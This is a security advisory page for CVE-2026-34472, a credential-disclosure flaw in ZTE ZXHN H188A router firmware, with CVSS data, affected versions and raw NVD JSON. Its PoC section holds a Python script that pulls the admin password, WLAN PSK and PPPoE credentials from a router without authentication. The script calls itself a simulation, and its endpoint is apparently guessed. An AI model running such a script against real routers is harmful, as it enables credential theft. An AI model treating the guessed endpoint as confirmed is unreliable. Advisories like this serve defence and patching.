Security Vulnerability Report
中文
CVE-2026-34472 CVSS 7.1 HIGH

CVE-2026-34472

Published: 2026-03-30 16:16:08
Last Modified: 2026-04-08 16:05:43

Description

Unauthenticated credential disclosure in the wizard interface in ZTE ZXHN H188A V6.0.10P2_TE and V6.0.10P3N3_TE allows unauthenticated attackers on the local network to retrieve sensitive credentials from the router's web management interface, including the default administrator password, WLAN PSK, and PPPoE credentials. In some observed cases, configuration changes may also be performed without authentication.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:zte:zxhn_h188a_firmware:6.0.10p2_te:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:zte:zxhn_h188a:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:zte:zxhn_h188a_firmware:6.0.10p3n3_te:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:zte:zxhn_h188a:-:*:*:*:*:*:*:* - NOT VULNERABLE
ZTE ZXHN H188A V6.0.10P2_TE
ZTE ZXHN H188A V6.0.10P3N3_TE

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target router IP address TARGET_IP = "192.168.1.1" # The vulnerable endpoint is typically part of the wizard interface # This is a simulation based on the vulnerability description url = f"http://{TARGET_IP}/api/backup/wizard_config.json" try: # Send unauthenticated request response = requests.get(url, timeout=10) if response.status_code == 200: print("[+] Successfully retrieved sensitive information:") print(response.text) # Response may contain: admin_pass, wifi_psk, pppoe_user, pppoe_pass else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34472", "sourceIdentifier": "[email protected]", "published": "2026-03-30T16:16:07.703", "lastModified": "2026-04-08T16:05:42.877", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unauthenticated credential disclosure in the wizard interface in ZTE ZXHN H188A V6.0.10P2_TE and V6.0.10P3N3_TE allows unauthenticated attackers on the local network to retrieve sensitive credentials from the router's web management interface, including the default administrator password, WLAN PSK, and PPPoE credentials. In some observed cases, configuration changes may also be performed without authentication."}, {"lang": "es", "value": "Divulgación de credenciales no autenticadas en la interfaz del asistente en ZTE ZXHN H188A V6.0.10P2_TE y V6.0.10P3N3_TE permite a atacantes no autenticados en la red local recuperar credenciales sensibles de la interfaz de gestión web del router, incluyendo la contraseña de administrador predeterminada, la PSK de WLAN y las credenciales de PPPoE. En algunos casos observados, también se pueden realizar cambios de configuración sin autenticación."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zte:zxhn_h188a_firmware:6.0.10p2_te:*:*:*:*:*:*:*", "matchCriteriaId": "4C920CDD-AFFF-460B-9A2A-86AB7394C97D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zte:zxhn_h188a:-:*:*:*:*:*:*:*", "matchCriteriaId": "B845C3EC-BB59-4F88-884B-D3C41305E464"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:zte:zxhn_h188a_firmware:6.0.10p3n3_te:*:*:*:*:*:*:*", "matchCriteriaId": "D30B37BD-1AF5-448E-8B0E-54E24A28936A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:zte:zxhn_h188a:-:*:*:*:*:*:*:*", "matchCriteriaId": "B845C3EC-BB59-4F88-884B-D3C41305E464"}]}]}], "references": [{"url": "https://gist.github.com/minanagehsalalma/7a8516b9b00d0008f2f25750320560c9", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.zte.com.cn/global/", "source": "[email protected]", "tags": ["Product"]}]}}